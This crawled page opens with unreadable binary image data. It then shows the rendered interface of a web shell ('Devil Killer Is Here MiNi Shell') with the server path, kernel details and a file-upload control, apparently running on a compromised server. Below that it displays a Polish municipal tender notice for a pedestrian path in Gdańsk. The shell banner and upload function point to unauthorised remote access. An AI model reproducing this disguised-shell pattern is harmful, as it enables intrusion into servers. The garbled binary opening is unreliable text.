JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240606/0035506301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ciągu pieszego wzdłuż ul. Pustej w Gdańsku w ramach realizacji zadania Budżetu Obywatelskiego „Wrota Olszynki- bezpieczne i atrakcyjne alejki piesze przy Opływie Motławy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Gdańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Urząd Miejski w Gdańsku - Biuro Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000598463</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowe Ogrody 8/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-803</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umg@gdansk.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gdansk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gdańskie Wody Sp. z o.o. w Gdańsku</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">583-001-08-23</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Kaczeńce 31</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">80-614</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@gdanskiewody.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.gdanskiewody.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ciągu pieszego wzdłuż ul. Pustej w Gdańsku w ramach realizacji zadania Budżetu Obywatelskiego „Wrota Olszynki- bezpieczne i atrakcyjne alejki piesze przy Opływie Motławy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-933d6196-23de-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00355063</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gdanskiewody.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gdanskiewody.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Ogólne zasady korzystania z Platformy, z zastrzeżeniem ust. 8 niniejszego Rozdziału;<br/>1)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gdańskie Wody Sp. z o.o.; https://gdanskiewody.ezamawiajacy.pl/, lub https://oneplace.marketplanet.pl.<br/>2)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>3)	Rejestracja konta następuje automatycznie poprzez:<br/>a)	podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym),<br/>lub<br/>b)	kontakt z numerem telefonu podanym w potwierdzeniu,<br/>lub<br/>c)	jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>4)	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem sekcji „Korespondencja”.<br/>4.	Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej Przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 6 dni przed upływem terminu składania ofert albo nie później niż na 4 dni przed upływem terminu składania ofert w przypadku, o którym mowa w art. 138 ust. 2 pkt 2, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na odpowiednio 14 albo 7 dni przed upływem terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści SWZ wpłynie po upływie terminu, o którym mowa powyżej, lub dotyczy udzielonych wyjaśnień, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.<br/>5.	Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem Platformy Zakupowej.<br/>6.	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platformy zakupowej Zamawiającego tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>7.	Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego jako:<br/>1)	dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2)	dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z <br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.), dalej „RODO”, informuję jak <br/>niżej: <br/>1) Administratorem Pani/Pana danych osobowych jest Gmina Miasta Gdańska – <br/>Prezydent Miasta, ul. Nowe Ogrody 8/12, 80-803 Gdańsk, z którym można <br/>20<br/>kontaktować się także poprzez adres e-mail: umg@gdansk.gda.pl; telefonicznie <br/>pod nr 48 58 52 44 500; ePUAP /UMGDA/SkrytkaESP; <br/>2) Kontakt z inspektorem ochrony danych jest możliwy przy użyciu kanałów <br/>komunikacji podanych wyżej w punkcie 1 oraz dodatkowo na adres e-mail: <br/>iod@gdansk.gda.pl. Pani/Pana dane osobowe przetwarzane będą na podstawie <br/>art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o <br/>udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również <br/>zawarcia umowy w sprawie zamówienia publicznego i jej realizacji, a także <br/>udokumentowania postępowania; <br/>3) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. <br/>74 ustawy Prawo zamówień publicznych, dalej „Pzp” oraz Prezes Urzędu <br/>Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A jako <br/>Administrator Danych Osobowych Użytkowników Platformy <br/>e-Zamówienia, na której Gmina Miasta Gdańska-Urząd Miejski w Gdańsku <br/>prowadzi postępowania o udzielenie zamówienia publicznego, działająca pod <br/>adresem https://ezamowienia.gov.pl/pl/; <br/>4) Pani/Pana dane osobowe będą przechowywane przez okres oznaczony kategorią <br/>archiwalną wskazaną w Jednolitym Rzeczowym Wykazie Akt stosowanym w <br/>Urzędzie Miejskim w Gdańsku. Dla dokumentów wytworzonych w ramach <br/>zamówień publicznych krajowych jest to okres 5 lat, dla zamówień publicznych <br/>unijnych jest to okres 10 lat. Okres przechowywania liczony jest od 1 stycznia roku <br/>następnego od daty zakończenia sprawy. Po upływie okresu przechowywania <br/>dokumentacja niearchiwalna podlega, po uzyskaniu zgody dyrektora właściwego <br/>archiwum państwowego, brakowaniu; <br/>5) Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem <br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje <br/>niepodania określonych danych wynikają z ustawy Pzp; <br/>6) Dane osobowe nie będą służyły do zautomatyzowanego podejmowania decyzji, <br/>w tym Pani/Pana profilowania; <br/>7) posiada Pani/Pan: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/>dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia <br/>Pani/Pana danych osobowych, przy czym skorzystanie z prawa do <br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku <br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień <br/>21<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać <br/>integralności protokołu oraz jego załączników; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których <br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania <br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia <br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby <br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii <br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania <br/>danych osobowych do czasu zakończenia postępowania o udzielenie <br/>zamówienia; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana <br/>dotyczących narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP-NF-06/2024/AW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem Zamówienia jest budowa ciągu pieszego wzdłuż ul. Pustej w Gdańsku <br/>w ramach realizacji zadania Budżetu Obywatelskiego „Wrota Olszynki- bezpieczne <br/>i atrakcyjne alejki piesze przy Opływie Motławy”. Inwestycja będzie zlokalizowana <br/>wzdłuż ul. Pustej w Gdańsku (dz. nr 2/2, obręb 113). <br/>2) Zakres przedmiotu zamówienia obejmuje m.in.: <br/>a) organizację i zagospodarowanie zaplecza budowy, <br/>b) wytyczenie geodezyjne i inwentaryzację geodezyjną powykonawczą, <br/>c) wykonanie chodnika zgodnie z dokumentacją projektową, <br/>d) zorganizowanie i prowadzenie niezbędnych prób i badań (jeżeli wystąpi taka <br/>konieczność), <br/>e) doprowadzenie terenu do stanu pierwotnego po zakończeniu robót, demontaż <br/>obiektów tymczasowych oraz uporządkowanie terenu, <br/>f) informowanie mieszkańców terenów objętych inwestycją o rozpoczęciu, <br/>zakończeniu robót i utrudnieniach związanych z prowadzonymi pracami, <br/>g) przygotowanie technicznej dokumentacji powykonawczej, <br/>h) wykonanie wszystkich niezbędnych czynności wymaganych przez uzgodnienie <br/>GZDiZ (znak: GZDiZ.ZD.6336.258.4.2022.2023.KK.262.4744) z zakresu budowy <br/>chodnika, <br/>i) zabezpieczenie zieleni znajdującej się w obrębie prowadzonych prac.<br/>3) Przedmiot zamówienia określa niniejsza Specyfikacja Warunków Zamówienia wraz <br/>z załącznikami. Opis przedmiotu zamówienia, określony został <br/>w Załączniku nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca jest zobowiązany określić cenę ofertową za wykonanie przedmiotu <br/>zamówienia w oparciu o opis przedmiotu zamówienia oraz warunki realizacji <br/>zamówienia zawarte w SWZ wraz z załącznikami. <br/>2. Oferowana cena za wykonanie przedmiotu zamówienia stanowić będzie <br/>wynagrodzenie całkowite i obejmować będzie wszelkie koszty związane <br/>z kompleksowym wykonaniem przedmiotu zamówienia. Nie dopuszcza się <br/>podawania w ofercie ceny z zastosowaniem upustu. <br/>3. Cena powinna być podana w złotych polskich, w kwocie brutto ze wskazaniem <br/>wartości podatku od towarów i usług (naliczonego według jednolitej stawki dla <br/>wszystkich elementów składowych ceny) oraz kwoty netto. <br/>4. Cena oferty powinna być wyrażona w złotych polskich (PLN) z dokładnością do <br/>dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie wcześniej niż w <br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie, wykonali należycie co najmniej jedno zamówienie, które obejmowało swoim <br/>zakresem wykonanie nawierzchni drogi lub drogi rowerowej lub ciągu pieszego lub <br/>ciągu pieszo-rowerowego lub ciągu pieszojezdnego, o wartości zamówienia równej <br/>lub wyższej niż 80 000,00 zł brutto. <br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy skierują do jego <br/>realizacji kierownika robót posiadającego uprawnienia budowlane do kierowania <br/>robotami budowlanymi w specjalności inżynieryjnej drogowej. <br/>3. Kierownik robót powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia <br/>07 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i <br/>Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do <br/>wykonywania samodzielnych funkcji technicznych w budownictwie lub <br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na <br/>podstawie wcześniej obowiązujących przepisów. <br/>4. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w <br/>budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, <br/>których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach <br/>określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy <br/>z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych <br/>w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, <br/>spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez <br/>zamawiającego. <br/>2) Oświadczenie, o którym mowa w pkt 1), stanowi dowód potwierdzający brak <br/>podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, na dzień <br/>składania ofert, tymczasowo zastępujący wymagane przez zamawiającego <br/>podmiotowe środki dowodowe. <br/>13<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, <br/>oświadczenie, o którym mowa w pkt 1), składa każdy z wykonawców. <br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie <br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców <br/>wykazuje spełnianie warunków udziału w postępowaniu. <br/>4) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów <br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa <br/>w pkt 1), także oświadczenie podmiotu udostępniającego zasoby, <br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio <br/>spełnianie warunków udziału w postępowaniu, w zakresie, w jakim 